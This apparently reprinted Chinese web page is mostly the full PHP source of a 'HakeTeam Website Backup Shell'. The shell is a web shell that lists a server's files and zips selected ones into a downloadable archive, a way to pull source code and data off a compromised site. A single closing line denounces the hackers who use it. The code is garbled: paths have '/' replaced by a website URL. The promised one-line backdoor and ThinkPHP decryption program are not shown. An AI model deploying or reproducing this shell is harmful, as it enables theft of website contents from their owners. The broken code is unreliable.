PHP隐形一句话后门,和ThinkPHP框架加密码程序(b(2)


<?php
echo '<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>HakeTeam Website Backup V1.0 Beta - ';echo getenv('HTTP_HOST');;echo '</title>
<style type="text/css">
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{
margin:0;padding:0;
}
body {
background:#EBEBED;
color:#333;
font-family:"Arial",Microsoft YaHei,Verdana,Helvetica,Arial,Sans-Serif;
font-size:14px;
}
.textfield,textarea {
border:1px solid green;
font-size:14px;
padding:2px;
}
.textfield:focus,textarea:focus {
border-color:#F1CA7E;
}
.button {
font-size:14px;
text-decoration:none;
margin-top:5px;
background:#F5F5F5;
border:1px solid green;
color:#000;
padding:2px 5px;
}
.button:hover {
text-decoration:none;
background:#EEE;
border:1px solid #F1CA7E;
color:#000;
}
pre {
border:1px #ccc solid;
line-height:18px;
overflow:auto;
word-wrap:break-word;
max-height:220px;
margin:4px;
padding:4px 8px;
}
</style>
</head>
<form action="" method="post">
<div>
';
ini_set('memory_limit','2048M');
echo "<pre> ----------------------------------------------
[<font color=#00BB00>*</font>]HakeTeam PHP Website Backup Shell V1.0 Beta
[<font color=#00BB00>*</font>]Forum:
[<font color=#00BB00>*</font>]isosky's Blog:
----------------------------------------------
File List:</pre>";
$fdir = opendir('./');
while($file=readdir($fdir))
{
if($file=='.'||$file=='..')
continue;
echo "<input type='checkbox' value='$file' ".($file==basename(__FILE__)?'':'checked').'> ';
if(is_file($file))
{
echo "<font face=\"wingdings\" size=\"5\">2</font>&nbsp;&nbsp;$file<br>";
}
else
{
echo "<font face=\"wingdings\" size=\"5\">0</font>&nbsp;$file<br>";
}
}
;echo '
FileType:
<input type="text" value="" size="50">
(Blank for all,use "|" to separate,e.g.:php|html|jpg) <br />
Backup Directory:
<input type="text" value="iso_backup" size="41">
(Blank for this directory,use relative url,and you must be able to write file)
<br>
Backup Name:
<input type="text" value="iso.zip" size="44">
(.zip type file)
<br>
<br>
<input type="hidden" value="dozip">
<input type="submit" value="let\'s go!">
<div>
<a href="https://nbst.org"><img src="https://nbst.org/logo.png"></a></div>
<div>
';
set_time_limit(0);
class PHPzip
{
var $file_count = 0 ;
var $datastr_len = 0;
var $dirstr_len = 0;
var $filedata = '';
var $gzfilename;
var $fp;
var $dirstr='';
var $filefilters = array();
function SetFileFilter($filetype)
{
$this->filefilters = explode('|',$filetype);
}
function unix2DosTime($unixtime = 0)
{
$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
if ($timearray['year'] <1980)
{
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
}
function startfile($path = 'dodo.zip')
{
$this->gzfilename=$path;
$mypathdir=array();
do
{
$mypathdir[] = $path = dirname($path);
}while($path != '.');
@end($mypathdir);
do
{
$path = @current($mypathdir);
@mkdir($path);
}while(@prev($mypathdir));
if($this->fp=@fopen($this->gzfilename,'w'))
{
return true;
}
return false;
}
function addfile($data,$name)
{
$name = str_replace('\\','https://www.jb51.net/',$name);
if(strrchr($name,'https://www.jb51.net/')=='https://www.jb51.net/')
return $this->adddir($name);
if(!empty($this->filefilters))
{
if (!in_array(end(explode('.',$name)),$this->filefilters))
{
return;
}
}
$dtime = dechex($this->unix2DosTime());
$hexdtime = '\x'.$dtime[6] .$dtime[7] .'\x'.$dtime[4] .$dtime[5] .'\x'.$dtime[2] .$dtime[3] .'\x'.$dtime[0] .$dtime[1];
eval('$hexdtime = "'.$hexdtime .'";');
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata,0,strlen($zdata) -4),2);
$datastr = "\x50\x4b\x03\x04";
$datastr .= "\x14\x00";
$datastr .= "\x00\x00";
$datastr .= "\x08\x00";
$datastr .= $hexdtime;
$datastr .= pack('V',$crc);
$datastr .= pack('V',$c_len);
$datastr .= pack('V',$unc_len);
$datastr .= pack('v',strlen($name));
$datastr .= pack('v',0);
$datastr .= $name;
$datastr .= $zdata;
$datastr .= pack('V',$crc);
$datastr .= pack('V',$c_len);
$datastr .= pack('V',$unc_len);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02";
$dirstr .= "\x00\x00";
$dirstr .= "\x14\x00";
$dirstr .= "\x00\x00";
$dirstr .= "\x08\x00";
$dirstr .= $hexdtime;
$dirstr .= pack('V',$crc);
$dirstr .= pack('V',$c_len);
$dirstr .= pack('V',$unc_len);
$dirstr .= pack('v',strlen($name) );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('v',0 );
$dirstr .= pack('V',32 );
$dirstr .= pack('V',$this->datastr_len );
$dirstr .= $name;
$this->dirstr .= $dirstr;
$this ->file_count ++;
$this ->dirstr_len += strlen($dirstr);
$this ->datastr_len += $my_datastr_len;
}
function adddir($name)
{
$name = str_replace("\\",'https://www.jb51.net/',$name);
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$datastr .= pack('V',0).pack('V',0).pack('V',0).pack('v',strlen($name) );
$datastr .= pack('v',0 ).$name.pack('V',0).pack('V',0).pack('V',0);
fwrite($this->fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dirstr .= pack('V',0).pack('V',0).pack('V',0).pack('v',strlen($name) );
$dirstr .= pack('v',0 ).pack('v',0 ).pack('v',0 ).pack('v',0 );
$dirstr .= pack('V',16 ).pack('V',$this->datastr_len).$name;
$this->dirstr .= $dirstr;
$this ->file_count ++;
$this ->dirstr_len += strlen($dirstr);
$this ->datastr_len += $my_datastr_len;
}
function createfile()
{
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00".
pack('v',$this ->file_count) .
pack('v',$this ->file_count) .
pack('V',$this ->dirstr_len) .
pack('V',$this ->datastr_len) .
"\x00\x00";
fwrite($this->fp,$this->dirstr.$endstr);
fclose($this->fp);
}
}
if(!trim($_REQUEST[zipname]))
$_REQUEST[zipname] = 'dodozip.zip';
else
$_REQUEST[zipname] = trim($_REQUEST[zipname]);
if(!strrchr(strtolower($_REQUEST[zipname]),'.')=='.zip')
$_REQUEST[zipname] .= '.zip';
$_REQUEST[todir] = str_replace('\\','https://www.jb51.net/',trim($_REQUEST[todir]));
if(!strrchr(strtolower($_REQUEST[todir]),'https://www.jb51.net/')=='https://www.jb51.net/')
$_REQUEST[todir] .= 'https://www.jb51.net/';
if($_REQUEST[todir]=='https://www.jb51.net/')
$_REQUEST[todir] = './';
function listfiles($dir='.')
{
global $dodozip;
$sub_file_num = 0;
if(is_file("$dir"))
{
if(realpath($dodozip ->gzfilename)!=realpath("$dir"))
{
$dodozip ->addfile(implode('',file("$dir")),"$dir");
return 1;
}
return 0;
}
$handle=opendir("$dir");
while ($file = readdir($handle))
{
if($file=='.'||$file=='..')
continue;
if(is_dir("$dir/$file"))
{
$sub_file_num += listfiles("$dir/$file");
}
else
{
if(realpath($dodozip ->gzfilename)!=realpath("$dir/$file"))
{
$dodozip ->addfile(implode('',file("$dir/$file")),"$dir/$file");
$sub_file_num ++;
}
}
}
closedir($handle);
if(!$sub_file_num)
$dodozip ->addfile('',"$dir/");
return $sub_file_num;
}
function num_bitunit($num)
{
$bitunit=array(' B',' KB',' MB',' GB');
for($key=0;$key<count($bitunit);$key++)
{
if($num>=pow(2,10*$key)-1)
{
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
}
}
return $num_bitunit_str;
}
if(is_array($_REQUEST[dfile]))
{
$dodozip = new PHPzip;
if($_REQUEST['filetype'] != NULL)
$dodozip ->SetFileFilter($_REQUEST['filetype']);
if($dodozip ->startfile("https://www.jb51.net/$_REQUEST[todir]$_REQUEST[zipname]"))
{
echo 'Working,Please wait...<br><br>';
$filenum = 0;
foreach($_REQUEST[dfile] as $file)
{
if(is_file($file))
{
if(!empty($dodozip ->filefilters))
if (!in_array(end(explode('.',$file)),$dodozip ->filefilters))
continue;
echo "<font face=\"wingdings\" size=\"5\">2</font>&nbsp;&nbsp;$file<br>";
}
else
{
echo "<font face=\"wingdings\" size=\"5\">0</font>&nbsp;$file<br>";
}
$filenum += listfiles($file);
}
$dodozip ->createfile();
echo "<br>success,For $filenum files.Url:<a href='https://www.jb51.net/$_REQUEST[todir]$_REQUEST[zipname]' _fcksavedurl='https://www.jb51.net/$_REQUEST[todir]$_REQUEST[zipname]'>$_REQUEST[todir]$_REQUEST[zipname] (".num_bitunit(filesize("https://www.jb51.net/$_REQUEST[todir]$_REQUEST[zipname]")).')</a>';
}
else
{
echo "$_REQUEST[todir]$_REQUEST[zipname] Error,Unable to write file.<br>";
}
}
;echo '
</form>
</body>
</html>
';?>


这是一个用来打包成zip的php代码,这些鸟人为了黑别人的网站什么办法都用,真恶心~~
下如是一个高人写的ThinkPHP框架(sgcms)解密程序:

复制代码 代码如下:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/a484fcd340a7bc86b2a351c9bd1b0962.html